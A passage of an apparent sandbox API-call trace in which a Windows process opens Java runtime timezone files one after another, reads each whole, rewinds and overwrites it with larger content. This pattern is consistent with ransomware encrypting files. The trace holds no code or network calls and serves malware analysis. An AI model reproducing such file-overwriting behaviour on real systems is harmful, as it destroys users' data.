lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3d0 [0135.979] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0135.979] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.979] ReleaseMutex (hMutex=0x168) returned 1 [0135.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Baku", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0135.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Baku", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Baku", lpUsedDefaultChar=0x0) returned 4 [0135.979] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3d0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x311f2bc*=0x3d0, lpOverlapped=0x0) returned 1 [0136.044] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.044] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x958, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x958, lpOverlapped=0x0) returned 1 [0136.044] CloseHandle (hObject=0x1d4) returned 1 [0136.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0136.086] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.086] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x514 [0136.087] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.087] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.087] ReleaseMutex (hMutex=0x168) returned 1 [0136.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Damascus", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Damascus", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Damascus", lpUsedDefaultChar=0x0) returned 8 [0136.087] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x514, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x311f2bc*=0x514, lpOverlapped=0x0) returned 1 [0136.100] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.100] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0xa9c, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa9c, lpOverlapped=0x0) returned 1 [0136.100] CloseHandle (hObject=0x1d4) returned 1 [0136.100] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0136.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x269 [0136.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.101] ReleaseMutex (hMutex=0x168) returned 1 [0136.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hong_Kong", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hong_Kong", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hong_Kong", lpUsedDefaultChar=0x0) returned 9 [0136.102] ReadFile (in: hFile=0x1d4, lpBuffer=0x28721a8, nNumberOfBytesToRead=0x269, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28721a8*, lpNumberOfBytesRead=0x311f2bc*=0x269, lpOverlapped=0x0) returned 1 [0136.120] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.120] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7f1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7f1, lpOverlapped=0x0) returned 1 [0136.121] CloseHandle (hObject=0x1d4) returned 1 [0136.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0136.122] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.122] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x245 [0136.122] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.122] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.122] ReleaseMutex (hMutex=0x168) returned 1 [0136.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kamchatka", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kamchatka", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kamchatka", lpUsedDefaultChar=0x0) returned 9 [0136.123] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x311f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.124] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.124] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.124] CloseHandle (hObject=0x1d4) returned 1 [0136.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0136.125] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.125] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd9 [0136.126] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.126] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.126] ReleaseMutex (hMutex=0x168) returned 1 [0136.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuching", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuching", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kuching", lpUsedDefaultChar=0x0) returned 7 [0136.126] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ee73a8, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee73a8*, lpNumberOfBytesRead=0x311f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0136.127] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.127] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x661, lpOverlapped=0x0) returned 1 [0136.127] CloseHandle (hObject=0x1d4) returned 1 [0136.127] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.130] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.131] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x245 [0136.131] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.131] ReleaseMutex (hMutex=0x168) returned 1 [0136.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Novokuznetsk", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Novokuznetsk", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Novokuznetsk", lpUsedDefaultChar=0x0) returned 12 [0136.131] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x311f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.132] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.132] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.132] CloseHandle (hObject=0x204) returned 1 [0136.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.133] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.133] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1d1 [0136.134] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.134] ReleaseMutex (hMutex=0x168) returned 1 [0136.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Qyzylorda", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Qyzylorda", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Qyzylorda", lpUsedDefaultChar=0x0) returned 9 [0136.134] ReadFile (in: hFile=0x204, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d1, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x311f2bc*=0x1d1, lpOverlapped=0x0) returned 1 [0136.135] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.135] WriteFile (in: hFile=0x204, lpBuffer=0x28908e8*, nNumberOfBytesToWrite=0x759, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28908e8*, lpNumberOfBytesWritten=0x311f2d0*=0x759, lpOverlapped=0x0) returned 1 [0136.135] CloseHandle (hObject=0x204) returned 1 [0136.136] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Seoul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\seoul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.137] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.137] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa5 [0136.137] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.138] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.138] ReleaseMutex (hMutex=0x168) returned 1 [0136.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Seoul", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Seoul", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Seoul", lpUsedDefaultChar=0x0) returned 5 [0136.138] ReadFile (in: hFile=0x204, lpBuffer=0x1f37b18, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37b18*, lpNumberOfBytesRead=0x311f2bc*=0xa5, lpOverlapped=0x0) returned 1 [0136.139] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.140] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x62d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x62d, lpOverlapped=0x0) returned 1 [0136.140] CloseHandle (hObject=0x204) returned 1 [0136.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.142] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.142] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7d [0136.142] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.142] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.142] ReleaseMutex (hMutex=0x168) returned 1 [0136.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tokyo", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tokyo", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tokyo", lpUsedDefaultChar=0x0) returned 5 [0136.143] ReadFile (in: hFile=0x204, lpBuffer=0x1f307e8, nNumberOfBytesToRead=0x7d, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f307e8*, lpNumberOfBytesRead=0x311f2bc*=0x7d, lpOverlapped=0x0) returned 1 [0136.144] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.144] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x605, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x605, lpOverlapped=0x0) returned 1 [0136.144] CloseHandle (hObject=0x204) returned 1 [0136.144] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.146] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.146] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x235 [0136.146] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0136.146] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.146] ReleaseMutex (hMutex=0x168) returned 1 [0136.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yerevan", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yerevan", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yerevan", lpUsedDefaultChar=0x0) returned 7 [0136.146] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x235, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x311f2bc*=0x235, lpOverlapped=0x0) returned 1 [0136.148] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0136.148] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x7bd, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x7bd, lpOverlapped=0x0) returned 1 [0136.148] CloseHandle (hObject=0x204) returned 1 [0136.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0139.950] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0139.950] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0139.950] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0139.950] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.950] ReleaseMutex (hMutex=0x168) returned 1 [0139.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="South_Georgia", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="South_Georgia", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="South_Georgia", lpUsedDefaultChar=0x0) returned 13 [0139.950] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0139.951] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0139.951] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0139.951] CloseHandle (hObject=0x1fc) returned 1 [0139.952] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0140.666] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0140.667] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 